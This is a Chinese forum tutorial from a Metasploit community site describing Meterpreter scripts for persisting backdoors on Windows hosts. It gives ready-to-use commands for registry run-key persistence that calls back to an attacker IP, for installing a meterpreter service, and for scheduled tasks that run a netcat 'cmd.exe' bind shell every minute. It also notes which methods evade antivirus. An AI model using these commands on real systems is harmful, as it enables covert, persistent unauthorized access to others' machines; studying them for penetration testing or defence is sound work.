Metasploit渗透测试论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

Metascan metasploit pro
查看: 782|回复: 0

MSF中用于创建控制后门脚本

[复制链接]

0

主题

0

好友

55

积分

正式会员

Rank: 2

发表于 2017-4-6 23:40:20 |显示全部楼层
本帖最后由 Souy 于 2017-4-6 23:43 编辑

1、Persistence
路径:metasploit/scripts/meterpreter/persistence.rb,用于创建通过启动项启动。会创建注册表,创建文件,很容易被杀软拦截。
使用举例:
run persistence -A -U -i 5 -p 443 -r 192.168.2.101
使用-S可创建服务。-U 会在HKCU添加启动项,-X 会在HKLM添加启动项
能实现同样功能的脚本还有:
exploit/windows/local/persistence.rb
exploit/windows/local/registry_persistence.rb

2、Metsvc
路径:metasploit/scripts/meterpreter/metsvc.rb,用于创建服务启动。会创建meterpreter服务,并上传三个文件,很容易被杀软拦截,且安装服务需要管理员权限。
使用举例:
run metsvc -A
使用 -r 参数可卸载服务。

3、Scheduleme & Schtasksabuse
路径:
metasploit/scripts/meterpreter/scheduleme.rb
metasploit/scripts/meterpreter/schtasksabuse.rb
这两个脚本都是通过schtasks来创建计划任务来达到维持权限的目的,区别是scheduleme 需要当前进程拥有最高管理权限,而schtasksabuse则不需要,(测试发现很容易被杀软拦截)。
使用举例:
scheduleme
run scheduleme -m 1 -e /tmp/nc.exe -o "-e cmd.exe -L -p 8080" #上传nc并创建计划任务每一分钟执行一次 'nc -e cmd.exe -L -p 8080'
run scheduleme -m 1 -c "cmd /c calc.exe" # 创建计划任务每一分钟执行一次打开计算器命令
其他参数有兴趣自己看看就不详细介绍了

schtasksabuse
run schtasksabuse -t 192.168.2.7 -c "cmd /c calc.exe" -d 4  #每隔4秒执行一次calc.exe
使用脚本需要加-t参数
能实现同样功能的脚本还有:
exploits/windows/local/s4u_persistence.rb

4、Mof_ps_persist
之前在 Powershell之MOF后门 提到过,创建WMI后门的一种方式,可以在你的MSF添加此脚本。(运行需要管理员权限,不容易被拦截)


如文中未特别声明转载请注明出自:http://www.metasploit.cn/
*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

QQ|Archiver|手机版|Metasploit ( 粤ICP备15008156号-1 )

GMT+8, 2017-8-24 18:25 , Processed in 0.291362 second(s), 27 queries .

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部